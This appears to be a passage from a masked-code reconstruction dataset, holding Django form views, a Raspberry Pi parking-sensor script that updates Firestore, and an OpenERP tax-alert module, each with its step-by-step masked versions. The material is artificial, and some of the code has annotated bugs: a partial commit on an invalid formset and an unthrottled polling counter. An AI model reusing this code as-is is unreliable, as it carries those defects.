                'body': 'अन्य ब्यक्ति संस्था निकाय पदाधिकारी',
            },
            {
                'body': 'अन्तरराष्ट्रिय गैर सरकारी संस्था',
            },
            {
                'body': 'गैरसरकारी संस्था',
            },
        ]
        return initial
    def get_context_data(self, **kwargs):
        """Add the line formset (bound on POST, with optional seed rows)
        to the template context."""
        data = super().get_context_data(**kwargs)
        initial = self._get_initial_data()
        if self.request.POST:
            data['lines'] = FundOperationFormSet(
                self.request.POST,
                instance=self.object,
                initial=initial
            )
        else:
            data['lines'] = FundOperationFormSet(
                instance=self.object,
                initial=initial
            )
        # One blank form per seed row; a single blank form when the
        # instance already has lines.
        data['lines'].extra = len(initial) if initial else 1
        return data
    def form_valid(self, form):
        """Save the parent object and its formset; re-render with errors
        when the formset is invalid."""
        context = self.get_context_data()
        lines = context['lines']
        with transaction.atomic():
            form.instance.create_user = self.request.user
            self.object = form.save()
            if lines.is_valid():
                lines.instance = self.object
                lines.save()
            else:
                # NOTE(review): returning here exits the atomic block
                # without an exception, so the parent form.save() above
                # is still committed even though the formset failed —
                # confirm this is intended.
                return self.form_invalid(form, lines)
        return super().form_valid(form)
    def form_invalid(self, form, lines=None):
        """Re-render the template with the invalid form and formset."""
        return self.render_to_response(self.get_context_data(form=form, lines=lines))
    def get_success_url(self):
        """Stay on this object's update page after a successful save."""
        return reverse_lazy('fund_operation:fund_operation_update', kwargs={'pk': self.object.pk})
|
normal
|
{
"blob_id": "3c2fb3d09edab92da08ac8850f650a2fa22fad92",
"index": 8806,
"step-1": "<mask token>\n\n\nclass FundOperationCreateView(CreateView):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def form_valid(self, form):\n context = self.get_context_data()\n lines = context['lines']\n with transaction.atomic():\n form.instance.create_user = self.request.user\n self.object = form.save()\n if lines.is_valid():\n lines.instance = self.object\n lines.save()\n return super().form_valid(form)\n <mask token>\n\n\nclass FundOperationUpdateView(UpdateView):\n model = FundOperation\n template_name = 'forms/fund_operation/update.html'\n form_class = FundOperationForm\n success_url = None\n\n def _get_initial_data(self):\n if self.object.lines.all():\n return None\n initial = [{'body': 'प्रदेश सरकार'}, {'body': 'संघीय सरकार'}, {\n 'body': 'स्थानीय तह'}, {'body':\n 'अन्य ब्यक्ति संस्था निकाय पदाधिकारी'}, {'body':\n 'अन्तरराष्ट्रिय गैर सरकारी संस्था'}, {'body': 'गैरसरकारी संस्था'}]\n return initial\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n initial = self._get_initial_data()\n if self.request.POST:\n data['lines'] = FundOperationFormSet(self.request.POST,\n instance=self.object, initial=initial)\n else:\n data['lines'] = FundOperationFormSet(instance=self.object,\n initial=initial)\n data['lines'].extra = len(initial) if initial else 1\n return data\n\n def form_valid(self, form):\n context = self.get_context_data()\n lines = context['lines']\n with transaction.atomic():\n form.instance.create_user = self.request.user\n self.object = form.save()\n if lines.is_valid():\n lines.instance = self.object\n lines.save()\n else:\n return self.form_invalid(form, lines)\n return super().form_valid(form)\n\n def form_invalid(self, form, lines=None):\n return self.render_to_response(self.get_context_data(form=form,\n lines=lines))\n\n def get_success_url(self):\n return reverse_lazy('fund_operation:fund_operation_update', kwargs=\n {'pk': self.object.pk})\n",
"step-2": "<mask token>\n\n\nclass FundOperationCreateView(CreateView):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n if self.request.POST:\n data['lines'] = FundOperationFormSet(self.request.POST)\n else:\n data['lines'] = FundOperationFormSet()\n return data\n\n def form_valid(self, form):\n context = self.get_context_data()\n lines = context['lines']\n with transaction.atomic():\n form.instance.create_user = self.request.user\n self.object = form.save()\n if lines.is_valid():\n lines.instance = self.object\n lines.save()\n return super().form_valid(form)\n <mask token>\n\n\nclass FundOperationUpdateView(UpdateView):\n model = FundOperation\n template_name = 'forms/fund_operation/update.html'\n form_class = FundOperationForm\n success_url = None\n\n def _get_initial_data(self):\n if self.object.lines.all():\n return None\n initial = [{'body': 'प्रदेश सरकार'}, {'body': 'संघीय सरकार'}, {\n 'body': 'स्थानीय तह'}, {'body':\n 'अन्य ब्यक्ति संस्था निकाय पदाधिकारी'}, {'body':\n 'अन्तरराष्ट्रिय गैर सरकारी संस्था'}, {'body': 'गैरसरकारी संस्था'}]\n return initial\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n initial = self._get_initial_data()\n if self.request.POST:\n data['lines'] = FundOperationFormSet(self.request.POST,\n instance=self.object, initial=initial)\n else:\n data['lines'] = FundOperationFormSet(instance=self.object,\n initial=initial)\n data['lines'].extra = len(initial) if initial else 1\n return data\n\n def form_valid(self, form):\n context = self.get_context_data()\n lines = context['lines']\n with transaction.atomic():\n form.instance.create_user = self.request.user\n self.object = form.save()\n if lines.is_valid():\n lines.instance = self.object\n lines.save()\n else:\n return self.form_invalid(form, lines)\n return super().form_valid(form)\n\n def form_invalid(self, form, lines=None):\n return 
self.render_to_response(self.get_context_data(form=form,\n lines=lines))\n\n def get_success_url(self):\n return reverse_lazy('fund_operation:fund_operation_update', kwargs=\n {'pk': self.object.pk})\n",
"step-3": "<mask token>\n\n\nclass FundOperationCreateView(CreateView):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n if self.request.POST:\n data['lines'] = FundOperationFormSet(self.request.POST)\n else:\n data['lines'] = FundOperationFormSet()\n return data\n\n def form_valid(self, form):\n context = self.get_context_data()\n lines = context['lines']\n with transaction.atomic():\n form.instance.create_user = self.request.user\n self.object = form.save()\n if lines.is_valid():\n lines.instance = self.object\n lines.save()\n return super().form_valid(form)\n\n def get_success_url(self):\n return reverse_lazy('fund_operation:fund_operation_create')\n\n\nclass FundOperationUpdateView(UpdateView):\n model = FundOperation\n template_name = 'forms/fund_operation/update.html'\n form_class = FundOperationForm\n success_url = None\n\n def _get_initial_data(self):\n if self.object.lines.all():\n return None\n initial = [{'body': 'प्रदेश सरकार'}, {'body': 'संघीय सरकार'}, {\n 'body': 'स्थानीय तह'}, {'body':\n 'अन्य ब्यक्ति संस्था निकाय पदाधिकारी'}, {'body':\n 'अन्तरराष्ट्रिय गैर सरकारी संस्था'}, {'body': 'गैरसरकारी संस्था'}]\n return initial\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n initial = self._get_initial_data()\n if self.request.POST:\n data['lines'] = FundOperationFormSet(self.request.POST,\n instance=self.object, initial=initial)\n else:\n data['lines'] = FundOperationFormSet(instance=self.object,\n initial=initial)\n data['lines'].extra = len(initial) if initial else 1\n return data\n\n def form_valid(self, form):\n context = self.get_context_data()\n lines = context['lines']\n with transaction.atomic():\n form.instance.create_user = self.request.user\n self.object = form.save()\n if lines.is_valid():\n lines.instance = self.object\n lines.save()\n else:\n return self.form_invalid(form, lines)\n return 
super().form_valid(form)\n\n def form_invalid(self, form, lines=None):\n return self.render_to_response(self.get_context_data(form=form,\n lines=lines))\n\n def get_success_url(self):\n return reverse_lazy('fund_operation:fund_operation_update', kwargs=\n {'pk': self.object.pk})\n",
"step-4": "<mask token>\n\n\nclass FundOperationCreateView(CreateView):\n model = FundOperation\n template_name = 'forms/fund_operation/create.html'\n form_class = FundOperationForm\n success_url = None\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n if self.request.POST:\n data['lines'] = FundOperationFormSet(self.request.POST)\n else:\n data['lines'] = FundOperationFormSet()\n return data\n\n def form_valid(self, form):\n context = self.get_context_data()\n lines = context['lines']\n with transaction.atomic():\n form.instance.create_user = self.request.user\n self.object = form.save()\n if lines.is_valid():\n lines.instance = self.object\n lines.save()\n return super().form_valid(form)\n\n def get_success_url(self):\n return reverse_lazy('fund_operation:fund_operation_create')\n\n\nclass FundOperationUpdateView(UpdateView):\n model = FundOperation\n template_name = 'forms/fund_operation/update.html'\n form_class = FundOperationForm\n success_url = None\n\n def _get_initial_data(self):\n if self.object.lines.all():\n return None\n initial = [{'body': 'प्रदेश सरकार'}, {'body': 'संघीय सरकार'}, {\n 'body': 'स्थानीय तह'}, {'body':\n 'अन्य ब्यक्ति संस्था निकाय पदाधिकारी'}, {'body':\n 'अन्तरराष्ट्रिय गैर सरकारी संस्था'}, {'body': 'गैरसरकारी संस्था'}]\n return initial\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n initial = self._get_initial_data()\n if self.request.POST:\n data['lines'] = FundOperationFormSet(self.request.POST,\n instance=self.object, initial=initial)\n else:\n data['lines'] = FundOperationFormSet(instance=self.object,\n initial=initial)\n data['lines'].extra = len(initial) if initial else 1\n return data\n\n def form_valid(self, form):\n context = self.get_context_data()\n lines = context['lines']\n with transaction.atomic():\n form.instance.create_user = self.request.user\n self.object = form.save()\n if lines.is_valid():\n lines.instance = self.object\n lines.save()\n 
else:\n return self.form_invalid(form, lines)\n return super().form_valid(form)\n\n def form_invalid(self, form, lines=None):\n return self.render_to_response(self.get_context_data(form=form,\n lines=lines))\n\n def get_success_url(self):\n return reverse_lazy('fund_operation:fund_operation_update', kwargs=\n {'pk': self.object.pk})\n",
"step-5": "from django.db import transaction\nfrom django.forms import inlineformset_factory\nfrom django.shortcuts import render\nfrom django.urls import reverse_lazy\nfrom django.views.generic import CreateView, UpdateView\nfrom forms.models.fund_operation import FundOperation\nfrom forms.forms.fund_operation_forms import FundOperationForm, FundOperationLineForm, FundOperationFormSet\n\n\nclass FundOperationCreateView(CreateView):\n model = FundOperation\n template_name = \"forms/fund_operation/create.html\"\n form_class = FundOperationForm\n success_url = None\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n if self.request.POST:\n data['lines'] = FundOperationFormSet(self.request.POST)\n else:\n data['lines'] = FundOperationFormSet()\n return data\n\n def form_valid(self, form):\n context = self.get_context_data()\n lines = context['lines']\n with transaction.atomic():\n form.instance.create_user = self.request.user\n self.object = form.save()\n if lines.is_valid():\n lines.instance = self.object\n lines.save()\n return super().form_valid(form)\n\n def get_success_url(self):\n return reverse_lazy('fund_operation:fund_operation_create')\n\n\nclass FundOperationUpdateView(UpdateView):\n model =FundOperation\n template_name = \"forms/fund_operation/update.html\"\n form_class = FundOperationForm\n success_url = None\n\n def _get_initial_data(self):\n if self.object.lines.all():\n return None\n\n initial = [\n {\n 'body': 'प्रदेश सरकार',\n },\n {\n 'body': 'संघीय सरकार',\n },\n {\n 'body': 'स्थानीय तह',\n },\n {\n 'body': 'अन्य ब्यक्ति संस्था निकाय पदाधिकारी',\n },\n {\n 'body': 'अन्तरराष्ट्रिय गैर सरकारी संस्था',\n },\n {\n 'body': 'गैरसरकारी संस्था',\n },\n ]\n return initial\n\n def get_context_data(self, **kwargs):\n data = super().get_context_data(**kwargs)\n\n initial = self._get_initial_data()\n if self.request.POST:\n data['lines'] = FundOperationFormSet(\n self.request.POST,\n instance=self.object,\n initial=initial\n 
)\n else:\n data['lines'] = FundOperationFormSet(\n instance=self.object,\n initial=initial\n )\n data['lines'].extra = len(initial) if initial else 1\n return data\n\n def form_valid(self, form):\n context = self.get_context_data()\n lines = context['lines']\n with transaction.atomic():\n form.instance.create_user = self.request.user\n self.object = form.save()\n if lines.is_valid():\n lines.instance = self.object\n lines.save()\n else:\n return self.form_invalid(form, lines)\n\n return super().form_valid(form)\n\n def form_invalid(self, form, lines=None):\n return self.render_to_response(self.get_context_data(form=form, lines=lines))\n\n def get_success_url(self):\n return reverse_lazy('fund_operation:fund_operation_update', kwargs={'pk': self.object.pk})\n",
"step-ids": [
9,
10,
11,
12,
14
]
}
|
[
9,
10,
11,
12,
14
] |
"""Raspberry Pi parking-lot monitor: polls two GPIO slot sensors and
pushes an occupancy counter to a Cloud Firestore document."""
import os
import RPi.GPIO as GPIO
from google.cloud import firestore
import time 
############Explicit Credential environment
# Point the Google client library at the service-account key file.
path="/home/pi/Desktop/Parking.json"
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] =path
#GPIO starts
# BCM pin numbers of the two slot sensors.
s1=2
s2=21
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(s1,GPIO.IN)
GPIO.setup(s2,GPIO.IN)
#firestore initialization
db = firestore.Client()
doc_ref_s1 = db.collection(u'sensors').document(u'sensor1')
# NOTE(review): doc_ref_s2 is created but never written below — confirm
# whether sensor2 state was meant to be pushed to Firestore as well.
doc_ref_s2 = db.collection(u'sensors').document(u'sensor2')
#here starts main
data1=0
data2=0
counter=0
# NOTE(review): this loop has no time.sleep even though `time` is
# imported, so it polls and writes to Firestore as fast as possible —
# presumably a sleep between iterations was intended.
while 1:
	# Sensors read active-low: input False means a car is detected.
	if(GPIO.input(s1)==False): #car found in slot 1
		data1=1
		counter+=1
	else: data1=0
	print("Received from 1: %s" % data1)
	###Now starts for sensor 2
	if(GPIO.input(s2)==False): #car found in slot 2
		data2=1
		counter-=1
	else: data2=0
	print("Received from 2: %s" % data2)
	# NOTE(review): the counter changes once per poll iteration while a
	# sensor stays blocked, not once per vehicle event — edge detection
	# may be needed. Clamped to the range [0, 8] (8 slots, presumably).
	if(counter>8):
		counter=8
	elif(counter<0):
		counter=0
	print("Counter= %s" % counter)
	doc_ref_s1.update({
		u'priority': counter
	})
|
normal
|
{
"blob_id": "e1cc4e17bffcbbae3e7785e4c55acde167a8a50a",
"index": 6482,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(s1, GPIO.IN)\nGPIO.setup(s2, GPIO.IN)\n<mask token>\nwhile 1:\n if GPIO.input(s1) == False:\n data1 = 1\n counter += 1\n else:\n data1 = 0\n print('Received from 1: %s' % data1)\n if GPIO.input(s2) == False:\n data2 = 1\n counter -= 1\n else:\n data2 = 0\n print('Received from 2: %s' % data2)\n if counter > 8:\n counter = 8\n elif counter < 0:\n counter = 0\n print('Counter= %s' % counter)\n doc_ref_s1.update({u'priority': counter})\n",
"step-3": "<mask token>\npath = '/home/pi/Desktop/Parking.json'\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = path\ns1 = 2\ns2 = 21\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(s1, GPIO.IN)\nGPIO.setup(s2, GPIO.IN)\ndb = firestore.Client()\ndoc_ref_s1 = db.collection(u'sensors').document(u'sensor1')\ndoc_ref_s2 = db.collection(u'sensors').document(u'sensor2')\ndata1 = 0\ndata2 = 0\ncounter = 0\nwhile 1:\n if GPIO.input(s1) == False:\n data1 = 1\n counter += 1\n else:\n data1 = 0\n print('Received from 1: %s' % data1)\n if GPIO.input(s2) == False:\n data2 = 1\n counter -= 1\n else:\n data2 = 0\n print('Received from 2: %s' % data2)\n if counter > 8:\n counter = 8\n elif counter < 0:\n counter = 0\n print('Counter= %s' % counter)\n doc_ref_s1.update({u'priority': counter})\n",
"step-4": "import os\nimport RPi.GPIO as GPIO\nfrom google.cloud import firestore\nimport time\npath = '/home/pi/Desktop/Parking.json'\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = path\ns1 = 2\ns2 = 21\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(s1, GPIO.IN)\nGPIO.setup(s2, GPIO.IN)\ndb = firestore.Client()\ndoc_ref_s1 = db.collection(u'sensors').document(u'sensor1')\ndoc_ref_s2 = db.collection(u'sensors').document(u'sensor2')\ndata1 = 0\ndata2 = 0\ncounter = 0\nwhile 1:\n if GPIO.input(s1) == False:\n data1 = 1\n counter += 1\n else:\n data1 = 0\n print('Received from 1: %s' % data1)\n if GPIO.input(s2) == False:\n data2 = 1\n counter -= 1\n else:\n data2 = 0\n print('Received from 2: %s' % data2)\n if counter > 8:\n counter = 8\n elif counter < 0:\n counter = 0\n print('Counter= %s' % counter)\n doc_ref_s1.update({u'priority': counter})\n",
"step-5": "import os\nimport RPi.GPIO as GPIO\nfrom google.cloud import firestore\nimport time \n\n############Explicit Credential environment\npath=\"/home/pi/Desktop/Parking.json\"\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] =path\n\n#GPIO starts\ns1=2\ns2=21\nGPIO.setmode(GPIO.BCM) \nGPIO.setwarnings(False)\nGPIO.setup(s1,GPIO.IN)\nGPIO.setup(s2,GPIO.IN)\n\n\n#firestore initialization\ndb = firestore.Client()\ndoc_ref_s1 = db.collection(u'sensors').document(u'sensor1')\t\t\t\ndoc_ref_s2 = db.collection(u'sensors').document(u'sensor2')\n#here starts main\ndata1=0\ndata2=0\ncounter=0\nwhile 1:\n\t\n\tif(GPIO.input(s1)==False): #car found in slot 1\n\t\tdata1=1\n\t\tcounter+=1\n\telse: data1=0\n \n\tprint(\"Received from 1: %s\" % data1)\n\t###Now starts for sensor 2\t\n\tif(GPIO.input(s2)==False): #car found in slot 2\n\t\tdata2=1\n\t\tcounter-=1\n\telse: data2=0\n\tprint(\"Received from 2: %s\" % data2)\n\tif(counter>8):\n\t\tcounter=8\n\telif(counter<0):\n\t\tcounter=0\n\tprint(\"Counter= %s\" % counter)\n\tdoc_ref_s1.update({\n\t\tu'priority': counter\n\t\t})\n\t\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2011 Eficent (<http://www.eficent.com/>)
# Jordi Ballester Alomar <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import tools
from osv import fields, osv
from tools.translate import _
from datetime import datetime, timedelta
# Format of the approval_date field stored on sgr.tax records.
date_format = '%Y-%m-%d'


class tax(osv.Model):
    """Posts chatter alerts on taxes whose payment deadline is near or past."""
    _inherit = 'sgr.tax'

    def send_alerts(self, cr, uid, context=None):
        """Cron entry point: alert on taxes due within the next 2 days."""
        self.send_alerts_with_upcoming_days(cr, uid, 2, context=context)

    def send_alerts_with_upcoming_days(self, cr, uid, upcoming_days, context=None):
        """Message every 'to_pay' tax whose approval_date has passed or
        falls within the next *upcoming_days* days.

        Records without an approval_date are skipped. Returns True (cron
        convention).
        """
        now = datetime.now()
        deadline = now + timedelta(days=upcoming_days)

        to_pay_ids = self.search(cr, uid, [('state', '=', 'to_pay')], context=context)

        due_soon = []
        overdue = []
        for record in self.browse(cr, uid, to_pay_ids, context=context):
            if not record.approval_date:
                continue
            approval_date = datetime.strptime(record.approval_date, date_format)
            if approval_date <= now:
                overdue.append(record)
            elif now < approval_date <= deadline:
                due_soon.append(record)

        for record in due_soon:
            self.message_post(cr, uid, [record.id], body="Tax payment deadline soon",
                              subtype="sgr_alerts.mt_tax_due_date_soon", context=context)
        for record in overdue:
            self.message_post(cr, uid, [record.id], body="Tax payment deadline expired",
                              subtype="sgr_alerts.mt_tax_due_date", context=context)

        return True


tax()
|
normal
|
{
"blob_id": "1ddec426e4ad50f1d0e8a57ed841fbdf8c51b00f",
"index": 9871,
"step-1": "<mask token>\n\n\nclass tax(osv.Model):\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass tax(osv.Model):\n _inherit = 'sgr.tax'\n\n def send_alerts(self, cr, uid, context=None):\n self.send_alerts_with_upcoming_days(cr, uid, 2, context=context)\n\n def send_alerts_with_upcoming_days(self, cr, uid, upcoming_days,\n context=None):\n now = datetime.now()\n now_plus_upcoming_days = now + timedelta(days=upcoming_days)\n tax_to_paid_ids = self.search(cr, uid, [('state', '=', 'to_pay')],\n context=context)\n tax_due_date_soon = []\n taxs_due = []\n overdue_taxs = []\n for tax in self.browse(cr, uid, tax_to_paid_ids, context=context):\n if not tax.approval_date:\n continue\n approval_date = datetime.strptime(tax.approval_date, date_format)\n if approval_date <= now:\n overdue_taxs.append(tax)\n elif now < approval_date and approval_date <= now_plus_upcoming_days:\n taxs_due.append(tax)\n for tax in taxs_due:\n self.message_post(cr, uid, [tax.id], body=\n 'Tax payment deadline soon', subtype=\n 'sgr_alerts.mt_tax_due_date_soon', context=context)\n for tax in overdue_taxs:\n self.message_post(cr, uid, [tax.id], body=\n 'Tax payment deadline expired', subtype=\n 'sgr_alerts.mt_tax_due_date', context=context)\n return True\n\n\ntax()\n",
"step-3": "<mask token>\ndate_format = '%Y-%m-%d'\n\n\nclass tax(osv.Model):\n _inherit = 'sgr.tax'\n\n def send_alerts(self, cr, uid, context=None):\n self.send_alerts_with_upcoming_days(cr, uid, 2, context=context)\n\n def send_alerts_with_upcoming_days(self, cr, uid, upcoming_days,\n context=None):\n now = datetime.now()\n now_plus_upcoming_days = now + timedelta(days=upcoming_days)\n tax_to_paid_ids = self.search(cr, uid, [('state', '=', 'to_pay')],\n context=context)\n tax_due_date_soon = []\n taxs_due = []\n overdue_taxs = []\n for tax in self.browse(cr, uid, tax_to_paid_ids, context=context):\n if not tax.approval_date:\n continue\n approval_date = datetime.strptime(tax.approval_date, date_format)\n if approval_date <= now:\n overdue_taxs.append(tax)\n elif now < approval_date and approval_date <= now_plus_upcoming_days:\n taxs_due.append(tax)\n for tax in taxs_due:\n self.message_post(cr, uid, [tax.id], body=\n 'Tax payment deadline soon', subtype=\n 'sgr_alerts.mt_tax_due_date_soon', context=context)\n for tax in overdue_taxs:\n self.message_post(cr, uid, [tax.id], body=\n 'Tax payment deadline expired', subtype=\n 'sgr_alerts.mt_tax_due_date', context=context)\n return True\n\n\ntax()\n",
"step-4": "import tools\nfrom osv import fields, osv\nfrom tools.translate import _\nfrom datetime import datetime, timedelta\ndate_format = '%Y-%m-%d'\n\n\nclass tax(osv.Model):\n _inherit = 'sgr.tax'\n\n def send_alerts(self, cr, uid, context=None):\n self.send_alerts_with_upcoming_days(cr, uid, 2, context=context)\n\n def send_alerts_with_upcoming_days(self, cr, uid, upcoming_days,\n context=None):\n now = datetime.now()\n now_plus_upcoming_days = now + timedelta(days=upcoming_days)\n tax_to_paid_ids = self.search(cr, uid, [('state', '=', 'to_pay')],\n context=context)\n tax_due_date_soon = []\n taxs_due = []\n overdue_taxs = []\n for tax in self.browse(cr, uid, tax_to_paid_ids, context=context):\n if not tax.approval_date:\n continue\n approval_date = datetime.strptime(tax.approval_date, date_format)\n if approval_date <= now:\n overdue_taxs.append(tax)\n elif now < approval_date and approval_date <= now_plus_upcoming_days:\n taxs_due.append(tax)\n for tax in taxs_due:\n self.message_post(cr, uid, [tax.id], body=\n 'Tax payment deadline soon', subtype=\n 'sgr_alerts.mt_tax_due_date_soon', context=context)\n for tax in overdue_taxs:\n self.message_post(cr, uid, [tax.id], body=\n 'Tax payment deadline expired', subtype=\n 'sgr_alerts.mt_tax_due_date', context=context)\n return True\n\n\ntax()\n",
"step-5": "# -*- coding: utf-8 -*-\n##############################################################################\n#\n# Copyright (C) 2011 Eficent (<http://www.eficent.com/>)\n# Jordi Ballester Alomar <[email protected]>\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see <http://www.gnu.org/licenses/>.\n#\n##############################################################################\n\nimport tools\nfrom osv import fields, osv\nfrom tools.translate import _\n\nfrom datetime import datetime, timedelta\n\ndate_format = '%Y-%m-%d'\n\nclass tax(osv.Model):\n _inherit = 'sgr.tax'\n \n def send_alerts(self, cr, uid, context=None):\n self.send_alerts_with_upcoming_days(cr, uid, 2, context=context)\n \n def send_alerts_with_upcoming_days(self, cr, uid, upcoming_days, context=None):\n now = datetime.now()\n now_plus_upcoming_days = now + timedelta(days=upcoming_days)\n \n tax_to_paid_ids = self.search(cr, uid, [('state','=','to_pay')], context=context)\n tax_due_date_soon = []\n \n taxs_due = []\n overdue_taxs = []\n \n for tax in self.browse(cr, uid, tax_to_paid_ids, context=context):\n if not tax.approval_date:\n continue\n \n approval_date = datetime.strptime(tax.approval_date, date_format)\n \n if approval_date <= now:\n overdue_taxs.append(tax)\n elif now < approval_date and approval_date <= now_plus_upcoming_days:\n taxs_due.append(tax)\n \n for tax in taxs_due:\n self.message_post(cr, uid, 
[tax.id], body=\"Tax payment deadline soon\", subtype=\"sgr_alerts.mt_tax_due_date_soon\", context=context)\n \n for tax in overdue_taxs:\n self.message_post(cr, uid, [tax.id], body=\"Tax payment deadline expired\", subtype=\"sgr_alerts.mt_tax_due_date\", context=context)\n \n #all_tax_ids = self.search(cr, uid, [], context=context)\n #for tax in self.browse(cr, uid, all_tax_ids, context=context):\n # print 'tax: ' + str(tax.id)\n # self.message_post(cr, uid, [tax.id], body=\"Due Date Soon\", subtype=\"sgr_alerts.mt_tax_due_date_soon\", context=context)\n \n \n return True\n \n \n \ntax()\n\n\n\n",
"step-ids": [
1,
5,
6,
7,
8
]
}
|
[
1,
5,
6,
7,
8
] |
from django.shortcuts import render
# from emaillist.models import Emaillist
from emaillist.models import Emaillist
from django.http import HttpResponseRedirect
# Create your views here.
# def index(request):
# emaillist_list = Emaillist.objects.all().order_by('-id') # db에서 objects 전체를 불러와서 변수에 저장
# data = {'emaillist_list':emaillist_list} # 딕션너리 형식으로 데이터에 저장
# return render(request, 'emaillist/index.html', data) # render 라는 임시변수에 url(request)에서 불러온 값으로 emillist/index.html 형식으로 data값을 출력한다.
def test_index(request):
    """Render the test index page with every Emaillist row, newest first."""
    print("test_index 함수 실행하자 ")
    rows = Emaillist.objects.all().order_by('-id')
    return render(request, 'emaillist/test_index.html', {'emaillist_list': rows})
# def form(request):
# return render(request, 'emaillist/form.html')
def test_form(request):
    """Render the test email-entry form page."""
    print("test 함수 실행하자 ")
    return render(request, 'emaillist/test_form.html')
def add(request):
    """Create an Emaillist row from the POSTed fields, then redirect to the list."""
    entry = Emaillist()
    entry.first_name = request.POST['fn']
    entry.last_name = request.POST['ln']
    entry.email = request.POST['email']
    entry.save()
    return HttpResponseRedirect('/emaillist')
#
# def add2(request):
# emaillist2 = Emaillist2()
# emaillist2.first_name = request.POST['fn']
# emaillist2.last_name = request.POST['ln']
# emaillist2.email = request.POST['email']
#
# emaillist2.save()
#
# return HttpResponseRedirect('/emaillist')
|
normal
|
{
"blob_id": "5220ad793788927e94caf7d6a42df11292851c67",
"index": 2734,
"step-1": "<mask token>\n\n\ndef test_form(request):\n print('test 함수 실행하자 ')\n return render(request, 'emaillist/test_form.html')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_form(request):\n print('test 함수 실행하자 ')\n return render(request, 'emaillist/test_form.html')\n\n\ndef add(request):\n emaillist = Emaillist()\n emaillist.first_name = request.POST['fn']\n emaillist.last_name = request.POST['ln']\n emaillist.email = request.POST['email']\n emaillist.save()\n return HttpResponseRedirect('/emaillist')\n",
"step-3": "<mask token>\n\n\ndef test_index(request):\n print('test_index 함수 실행하자 ')\n emaillist_list = Emaillist.objects.all().order_by('-id')\n data = {'emaillist_list': emaillist_list}\n return render(request, 'emaillist/test_index.html', data)\n\n\ndef test_form(request):\n print('test 함수 실행하자 ')\n return render(request, 'emaillist/test_form.html')\n\n\ndef add(request):\n emaillist = Emaillist()\n emaillist.first_name = request.POST['fn']\n emaillist.last_name = request.POST['ln']\n emaillist.email = request.POST['email']\n emaillist.save()\n return HttpResponseRedirect('/emaillist')\n",
"step-4": "from django.shortcuts import render\nfrom emaillist.models import Emaillist\nfrom django.http import HttpResponseRedirect\n\n\ndef test_index(request):\n print('test_index 함수 실행하자 ')\n emaillist_list = Emaillist.objects.all().order_by('-id')\n data = {'emaillist_list': emaillist_list}\n return render(request, 'emaillist/test_index.html', data)\n\n\ndef test_form(request):\n print('test 함수 실행하자 ')\n return render(request, 'emaillist/test_form.html')\n\n\ndef add(request):\n emaillist = Emaillist()\n emaillist.first_name = request.POST['fn']\n emaillist.last_name = request.POST['ln']\n emaillist.email = request.POST['email']\n emaillist.save()\n return HttpResponseRedirect('/emaillist')\n",
"step-5": "from django.shortcuts import render\n# from emaillist.models import Emaillist\nfrom emaillist.models import Emaillist\nfrom django.http import HttpResponseRedirect\n\n# Create your views here.\n\n# def index(request):\n# emaillist_list = Emaillist.objects.all().order_by('-id') # db에서 objects 전체를 불러와서 변수에 저장\n# data = {'emaillist_list':emaillist_list} # 딕션너리 형식으로 데이터에 저장\n# return render(request, 'emaillist/index.html', data) # render 라는 임시변수에 url(request)에서 불러온 값으로 emillist/index.html 형식으로 data값을 출력한다.\n\n\ndef test_index(request):\n print(\"test_index 함수 실행하자 \")\n emaillist_list = Emaillist.objects.all().order_by('-id') # db에서 objects 전체를 불러와서 변수에 저장\n data = {'emaillist_list':emaillist_list} # 딕션너리 형식으로 데이터에 저장\n return render(request, 'emaillist/test_index.html', data)\n\n# def form(request):\n# return render(request, 'emaillist/form.html')\n\ndef test_form(request):\n print(\"test 함수 실행하자 \")\n return render(request, 'emaillist/test_form.html')\n\n\ndef add(request):\n emaillist = Emaillist()\n emaillist.first_name = request.POST['fn'] # 웹에 first_name부분에 작성한 값 (index.html에서 input으로 받은 password) 을 가져와서 데이터베이스(emailist)의 first_name column에 저장\n emaillist.last_name = request.POST['ln'] # 웹에 last_name부분에 작성한 